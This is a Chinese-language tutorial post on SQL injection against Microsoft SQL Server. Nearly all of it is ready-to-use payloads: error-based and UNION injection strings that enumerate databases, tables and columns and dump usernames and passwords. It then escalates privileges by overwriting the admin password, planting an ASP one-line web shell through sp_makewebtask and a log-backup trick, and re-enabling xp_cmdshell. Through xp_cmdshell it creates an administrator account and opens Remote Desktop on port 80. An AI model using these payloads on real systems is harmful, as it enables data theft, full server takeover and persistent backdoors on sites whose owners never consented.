欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

SQL注入之SQL server

程序员文章站 2024-03-15 17:41:42
...

基础知识

1.SQL server是微软推出的关系型数据库,所以SQL server只能搭配Windows服务器使用;

2.SQL server数据库一般搭配的脚本语言为asp或aspx;

3.SQL server默认端口:1433

4.SQL server数据库以文件形式存在,文件后缀:

①xxx.mdf(数据库文件后缀)

②xxx.ldf(数据库日志文件后缀)

5.权限划分:
SQL注入之SQL server

注入利用

一、显错注入

1.数据库信息获取:

① 判断注入:通过修改URL参数判断是否将参数带入到数据库执行,如果有带入。即表示目标可能存在sql注入漏洞

②判断数据库类型:

And (select count(*) from sysobjects)>0     # mssql数据库
And (select count(*) from msysobjects)>0    # access数据库

③读取mssql信息:

and (1=select @@version)      # 报错读取数据库版本
#直接aaa@qq.com@version也能读取数据库版本

SQL注入之SQL server

and 1=(select db_name())       //报错读取数据库名
#直接?id=db_name()也能读取数据库名

SQL注入之SQL server
2.数据获取

①获取数据库名称

And 1=(select top 1 name from master..sysdatabases where dbid>4)
//查询第一个数据库名。dbid>4是排除SQL server数据库自带的4个系统数据库
And 1=(select top 1 name from master..sysdatabases where dbid>5)
//根据这个原理,通过修改dbid序号依次读取所有数据库名称
And 1=(select top 1 name from master..sysdatabases where dbid>4 and name <>'数据库名')
//添加条件排除获取到的数据库名称来读取下一个数据库名,效果和dbid>5相同

SQL注入之SQL server

And 1=(select name from master..sysdatabases for xml path)
//以xml格式列出所有数据库名

SQL注入之SQL server
② 获取表名

And 1=(select top 1 name from sysobjects where xtype='u') 
//返回表名newss
And 1=(select top 1 name from sysobjects where xtype=’u’ and name <>'newss')
//爆出另外一个表名。在后面不停and name <>'表名',即可依次获取所有表名

SQL注入之SQL server

And 1=(select name from sysobjects for xml path )
//以xml格式获取所有表名,但是无法指定数据库。无法判断表所属库

SQL注入之SQL server
③获取列名

and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'newss'))
//获取newss表下第一列。and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'newss')and name <>'id')
//获取newss表下排除id列的第一列。依次往下套娃,可获取所有字段名称

SQL注入之SQL server
④获取字段内容

and 1=(select top 1 username from newss)
and 1=(select top 1 password from newss)
//读取字段username,password第一列内容

SQL注入之SQL server

and 1=(select  top 1 username  from newss where username <> 'admin')
//带条件读取其他行的内容
and 1=(select username from newss where id =2)
//也可以通过操控id值读取其他行的数据

二、union注入

①判断字段数

order by 5--
//这里--是单行注释符,也可以写做#,根据回显判断当前表字段数为4(执行结果)

② 找到可以进行注入的字段

UNION SELECT null,null,null,null
//返回正常
UNION SELECT 1,null,null,null
//返回正常,说明第一列是数字型
UNION SELECT null,2,null,null
//报错,说明第二列是字符列。这样就可以在第二列进行注入

SQL注入之SQL server
③获取库信息

UNION SELECT null,db_name(),null,null
UNION SELECT null,@@version,null,null
UNION SELECT null,@@servername,null,null

SQL注入之SQL server

④查询表名

UNION SELECT null,(select top 1 name from sysobjects where xtype='u'),null,null
//当前表名
UNION SELECT null,(select top 1 name from sysobjects where xtype='u' and name <>'newss'),null,null
//套娃获取其他表名

SQL注入之SQL server

⑤获取列名

UNION SELECT null,(select top 1 name from syscolumns where id in (select id from sysobjects where name='newss') and name not in (select top 0 name from syscolumns where id in (select id from sysobjects where name='newss'))),null,null
//指定表newss名列第一列列名
UNION SELECT null,(select top 1 name from syscolumns where id in (select id from sysobjects where name='newss') and name not in (select top 1 name from syscolumns where id in (select id from sysobjects where name='newss'))),null,null
//指定表newss名列第二列列名

SQL注入之SQL server

⑥列数据

UNION SELECT null,username,password,null from newss
//查询newss表下username,password字段所有内容。//这里因为第三列也是字符型列,如果不是就要将username,password字段分开查询
UNION SELECT null,username,null,null from newss  where username not in (select top 0 username from newss)
//有时候直接跟表名无法查询可以用这个语句

SQL注入之SQL server

SA提权

① 权限判断

and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员 
and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限 
and 1=(select is_srvrolemember('public'))   //判断是否为public权限
and 1=convert(int,db_name())或1=(select db_name())  //当前数据库名 
and 1=(select @@servername)             //本地服务名 
and 1=(select HAS_DBACCESS('master'))  //判断是否有库读取权限

②修改管理员密码

;update newss set password='49ba59abbe56e057' where username='admin'
//将管理员表admin中admin用户的密码设置为123456,修改之前把原来密码备份,操作完成后修改回来
//通常在密码解不出又需要进管理员后台的情况下选择使用该方法

③直接getshell

;exec sp_makewebtask  'C:\inetpub\sql_inject\sqlserver 注入点\x1.asp','select''<%eval(request("cmd"))%>'''--
 //根据报错信息找到网站物理路径写入一句话
;EXEC sp_configure 'show advanced options',1; 
RECONFIGURE;
;exec sp_configure 'Web Assistant Procedures', 1; RECONFIGURE
//如果报错:找不到存储过程 'sp_makewebtask'。需要恢复sp_makewebtask存储过程再写入一句话
#如果目标是server2008及以上sp_makewebtask 这个存储过程就取消了无法再恢复

④调用系统命令

and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' AND name= 'xp_cmdshell')
//判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')
//判断xp_regread扩展存储过程是否存在
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 
//恢复xp_cmdshell:
;exec master..xp_cmdshell 'net user test 123.com /add'
;exec master..xp_cmdshell 'net localgroup administrators test /add'
// 新建用户,注意SQL server2008及之后版本需要强口令。如果sa被降权则无法创建用户

⑤开3389

;exec master..xp_cmdshell 'sc config termservice start=auto' 
;exec master..xp_cmdshell 'net start termservice' 
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f'  
//允许外部连接开启3389 
;exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x50 /f'   
//改端口到80
;exec master..xp_cmdshell "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"--
//利用dos命令开启3389

dbowner提权

//找到web目录后,就可以写入一句话木马了 
;alter database ssdown5 set RECOVERY FULL 
;create table test(str image)-- 
;backup log ssdown5 to disk='c:\test' with init-- 
;insert into test(str)values ('<%excute(request("cmd"))%>')-- 
;backup log ssdown5 to disk='c:\inetpub\wwwroot\x.asp'-- 
;alter database ssdown5 set RECOVERY simple

工具输入注入点和物理路径,直接拿shell。一步到位:
SQL注入之SQL server
=========================================================SQL注入之SQL server

相关标签: 渗透测试